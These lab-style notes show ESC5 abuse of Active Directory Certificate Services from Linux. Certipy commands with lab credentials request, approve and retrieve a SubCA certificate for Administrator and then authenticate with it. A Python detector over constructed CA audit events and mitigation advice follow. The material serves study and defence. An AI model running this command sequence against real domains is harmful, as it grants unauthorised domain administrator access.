ESC5 is a domain escalation technique that abuses weak access controls on Active Directory objects indirectly tied to ADCS; control over those objects can be turned into privilege escalation through ADCS.
The entire Public Key Infrastructure (PKI) can be compromised if an account holds elevated privileges over objects tied to the ADCS configuration, or if the ADCS server itself is compromised.
ESC5 Abuse from Linux
Enumerate the ADCS server with certipy find, using -ns for the DNS server IP and -dns-tcp so DNS queries go over TCP.
proxychains4 -q certipy find -u cken -p Superman001 -dc-ip 172.16.19.3 -stdout -ns 172.16.19.3 -dns-tcp
Replicate the ESC7 attack using the SubCA template to request a certificate as Administrator. Specify the -target-ip <ADCS Server> option because the ADCS server and the domain controller are different hosts.
proxychains4 -q certipy req -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -template SubCA -upn Administrator
Approve the request using the request ID returned in the previous step.
proxychains4 -q certipy ca -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -issue-request 10
Finally, retrieve the certificate and authenticate with it.
# Retrieve
proxychains4 -q certipy req -u cken -p Superman001 -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp -target-ip 172.16.19.5 -ca lab-WS01-CA -retrieve 10
# Authenticate
proxychains4 -q certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 172.16.19.3 -ns 172.16.19.3 -dns-tcp
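The request, pending and approve sequence above leaves a clear trail in the CA's Security log (Certification Services audit events 4886 request received, 4889 request set to pending, 4887 request approved and certificate issued). The following detector is an added example, not part of the original notes or of certipy: it replays constructed records modelled loosely on those events (the pipe-separated field layout is a simplification, not the exact Windows event text) and flags two things a defender wants to see: an issued certificate whose SAN UPN names a different account than the requester, and a pending SubCA request that was manually approved.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample records: a simplified rendering of CA audit events
# 4886 (request received), 4889 (request set to pending) and
# 4887 (request approved, certificate issued). Request 10 mirrors the
# SubCA flow described in the notes; request 11 is a normal user enrollment.
SAMPLE_EVENTS = [
    "4886|RequestId=10|Requester=LAB\\cken|Template=SubCA|Attributes=SAN:upn=Administrator@lab.local",
    "4889|RequestId=10|Requester=LAB\\cken",
    "4887|RequestId=10|Requester=LAB\\cken|Template=SubCA|Subject=CN=Administrator|SAN=upn=Administrator@lab.local",
    "4886|RequestId=11|Requester=LAB\\jdoe|Template=User|Attributes=",
    "4887|RequestId=11|Requester=LAB\\jdoe|Template=User|Subject=CN=jdoe|SAN=upn=jdoe@lab.local",
]


@dataclass
class RequestState:
    """What we have learned so far about one CA request ID."""
    requester: Optional[str] = None
    template: Optional[str] = None
    requested_san: Optional[str] = None
    pending: bool = False
    issued_san: Optional[str] = None


def parse_event(line: str):
    """Split 'EVENTID|k=v|k=v' into (event_id, {k: v}); only the first '=' separates key and value."""
    event_id, *fields = line.split("|")
    kv = {}
    for field_text in fields:
        key, _, value = field_text.partition("=")
        kv[key] = value
    return int(event_id), kv


def account_name(requester: str) -> str:
    """'LAB\\cken' -> 'cken' (lower-cased sAMAccountName)."""
    return requester.split("\\")[-1].lower()


def upn_from_san(value: Optional[str]) -> Optional[str]:
    """Pull the UPN out of a SAN attribute string such as 'SAN:upn=x@y' or 'upn=x@y'."""
    match = re.search(r"upn[=:]([^,;]+)", value or "", re.IGNORECASE)
    return match.group(1).lower() if match else None


def analyze(lines):
    """Return a list of (request_id, reason) findings for suspicious issuances."""
    states = {}
    findings = []
    for line in lines:
        event_id, kv = parse_event(line)
        rid = kv["RequestId"]
        state = states.setdefault(rid, RequestState())
        if event_id == 4886:
            state.requester = kv.get("Requester")
            state.template = kv.get("Template")
            state.requested_san = upn_from_san(kv.get("Attributes"))
        elif event_id == 4889:
            state.pending = True
        elif event_id == 4887:
            state.issued_san = upn_from_san(kv.get("SAN"))
            state.template = kv.get("Template", state.template)
            requester = kv.get("Requester", state.requester)
            upn = state.issued_san or state.requested_san
            # Finding 1: the certificate identifies someone other than the requester.
            if upn and requester and upn.split("@")[0] != account_name(requester):
                findings.append((rid, f"SAN UPN {upn} does not match requester {requester}"))
            # Finding 2: a SubCA request that sat in pending state and was then approved,
            # which implies a manual CA officer approval rather than automatic issuance.
            if state.pending and state.template and state.template.lower() == "subca":
                findings.append((rid, "pending SubCA request was manually approved"))
    return findings


if __name__ == "__main__":
    for request_id, reason in analyze(SAMPLE_EVENTS):
        print(f"request {request_id}: {reason}")
```

To feed this from a real CA, enable the Certification Services audit subcategory on the CA host and export the 4886/4887/4889 events into the same key/value shape; the two findings map directly to the mitigations for this flow (remove CA officer rights and enrollment rights from non-administrative accounts, and alert on any SubCA issuance).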